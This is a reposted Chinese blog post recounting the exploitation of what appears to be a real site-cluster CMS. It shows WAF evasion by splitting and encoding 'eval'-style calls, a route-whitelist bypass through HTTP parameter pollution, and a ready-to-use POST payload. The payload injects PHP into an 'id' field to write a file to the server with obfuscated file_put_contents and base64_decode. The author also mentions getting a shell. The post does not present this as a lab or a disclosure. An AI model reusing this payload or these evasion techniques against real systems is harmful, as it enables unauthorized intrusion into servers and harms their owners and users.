banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

(轉載)寶 想你啦~

已授權轉載,有興趣可以關注下公眾號

某集約化站群去年留的漏洞,今年用的時候發現被攔截了。吐槽下,這是徹底瘋狂了嗎,百度雲 waf、華為雲 waf、安全狗都弄一起是什麼鬼啊.....

waf bypass

比較簡單,過濾了 eval 編碼下就行。

image

路由白名單限制 bypass

隨意請求訪問發現存在路由限制,只允許訪問指定路徑。

640

但是不可能所有路徑都寫死,比如搜索功能需要接收用戶輸入內容,抓包確認搜索接口可以正常使用且不會觸發路由白名單限制。

640

因此猜測可以利用參數污染繞過限制,例如:

#插入同名參數
/index.php?name=bob&name=rose

#後端實際可能接收
name=rose

getshell 後查看代碼,確認該接口匹配的是任意內容。

Snipaste_2024-10-20_18-15-37

最終 payload

POST /index.php?c=api&m=essearchlist&s=mmyzj&c=Toup&m=Zj_Post HTTP/2
Host:
Content-Type: application/x-www-form-urlencoded
Content-Length: 147

id='-("fil"."e"._."pu"."t"._."contents")("./kfc2024.php",("base"."64"._."decode")('a2ZjX3ZfbWVfNTA='),FILE_APPEND)-'
載入中......
此文章數據所有權由區塊鏈加密技術和智能合約保障僅歸創作者所有。